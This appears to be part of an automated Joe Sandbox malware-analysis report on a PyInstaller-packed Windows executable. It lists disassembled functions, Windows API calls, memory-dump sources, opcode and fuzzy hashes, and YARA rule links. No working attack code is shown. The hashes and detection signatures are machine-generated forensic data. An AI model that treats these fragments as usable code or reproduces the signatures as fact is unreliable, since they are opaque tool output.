                                                                                                                                                                                                                                    • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                    • Instruction ID: 7328b5335f14f978fadc7de4fc29c1b614f877a6a55733838be0f5b991dcf43c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E04F10E0B20242FE4B7BBD984517BA2606FA6701FC44034CB0D862B9FDAC6851C730
                                                                                                                                                                                                                                    Function 00007FF7B2B7AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABC6
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                    • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                    • Instruction ID: 59b5ef50c0d108ecc0d47cd08d1b9d63ba2930416399e5d6fe1886c0a2f4c0a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA21FC20F0A64241FAD7776D94403BBA2925FA67A0F840239DB2E477EDEEECE440C310
                                                                                                                                                                                                                                    Function 00007FF7B2B7BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                    • Instruction ID: 11e717803c3fe103e66090c19bca8d724c148768f7d4a34f0eb454ef87364c13
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4741D83290A24187EA75BA1DA44017EF360EB67B50F940131DB8E476EDEFACE402CF60
                                                                                                                                                                                                                                    Function 00007FFD93D12FB8 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B222F020
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2168931217-0
                                                                                                                                                                                                                                    • Opcode ID: 7e0fdb752a10548c561c295598ecdd6ced2e369889b2766dece0c5918b55e072
                                                                                                                                                                                                                                    • Instruction ID: 9aa5cbcab0c3cdcf195f9d082f0401883acac40005a7733eeaf3a44e03b73132
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e0fdb752a10548c561c295598ecdd6ced2e369889b2766dece0c5918b55e072
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31A4A5F0D68142EE64CBD6B47013957A8EF8AFC0F481535EE4EA7B49DF2CE8418700
                                                                                                                                                                                                                                    Function 00007FF7B2B67F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                    • Opcode ID: aa8733aac9d759589a50dfa5595dc90e342373a27925929eae3f9e33c74ff2d7
                                                                                                                                                                                                                                    • Instruction ID: c7b40a920e8ba4471ae5cea794db5af0772afda13ad2f2975ca09efdb3ec48fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa8733aac9d759589a50dfa5595dc90e342373a27925929eae3f9e33c74ff2d7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A621B421B1A65146FE12BA2A64043BBE651BF56BC4FC85D31EF0C4B78AEEBDE045C314
                                                                                                                                                                                                                                    Function 00007FF7B2B7B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                    • Instruction ID: 334d9ec49b9f0bec4668ba8a6a20c87f2549fad78403424e4908ab5d3a087571
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2231B422A1961185F6577B5D844037EB660AF62B61FC10135EB2D073FAEEFCA441CB31
                                                                                                                                                                                                                                    Function 00007FF7B2B79961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                    • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                    • Instruction ID: f56cbef254075cacb59bf2bfae12ff5dbf098cdb6a0b6e40a100ed84839563cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A21D172A06B4589FB22AF6CC0802ED33A0FB15718F840636D76C06BE9EFB8D544C750
                                                                                                                                                                                                                                    Function 00007FF7B2B75F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                    • Instruction ID: eed8ff58d0fa03ff6c16851f530fbb338976e11d3655b6aef7aea8bbb7898440
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E115321A2E64141EA62BF1D940057BE264AFA6B84FC44435EF5C5BABDEFBCD440C720
                                                                                                                                                                                                                                    Function 00007FF7B2B86354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                    • Instruction ID: 7543b3986f57d9dc492dd4784539977a39dca3dbd745c335bba1c435759a8885
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21C832A09A4186D762AF1CD44437AB6A0FBA9B54F98423CE76D4B6DDEF7CD401CB10
                                                                                                                                                                                                                                    Function 00007FF7B2B703BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                    • Instruction ID: 34be571ed70018cc70efd49e67833fe27543d6cd3aa336a63277aa2158903c60
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01862161974140E905FB5E590116AE6A5BFA6FE0F8C4631DF6C17BEEEE7CD401C310
                                                                                                                                                                                                                                    Function 00007FF7B2B68E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00007FF7B2B66476,?,00007FF7B2B6336E), ref: 00007FF7B2B68EA2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2592636585-0
                                                                                                                                                                                                                                    • Opcode ID: 21bc2cb28f6cff2a1fc1500461fc8769c892aca6a7c8e7e34e578de7ec179b05
                                                                                                                                                                                                                                    • Instruction ID: 5b71553d5a7734892a3738002d3998ef058c378981572476ded0374d2097c216
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21bc2cb28f6cff2a1fc1500461fc8769c892aca6a7c8e7e34e578de7ec179b05
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46D08C01B2664542EA49B76BBA4666A9261AB9ABC0F98C035EF0D47B5EEC3CC0418B00
                                                                                                                                                                                                                                    Function 00007FF7B2B7D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF7B2B70C90,?,?,?,00007FF7B2B722FA,?,?,?,?,?,00007FF7B2B73AE9), ref: 00007FF7B2B7D63A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                    • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                    • Instruction ID: 5e07107eec4320a1f9bd7af0575cbdefb07424cbd607d856506c897e028c0d8c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F03A11A0B24344FE563A7D580127691904FA67E0F880630DE2E852EAFEACE480C530

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00007FF7B2B689E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                    • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                    • Instruction ID: cb507049de633456afe1f32bf99a2bb64d7ed7002b7c7c3c0bbf6689f7aa8371
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD1C731A0AA8285E712AF38E8542ABB760FF66758F840139DB5D876ACEF7CD144C710
                                                                                                                                                                                                                                    Function 00007FFD93D1266C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
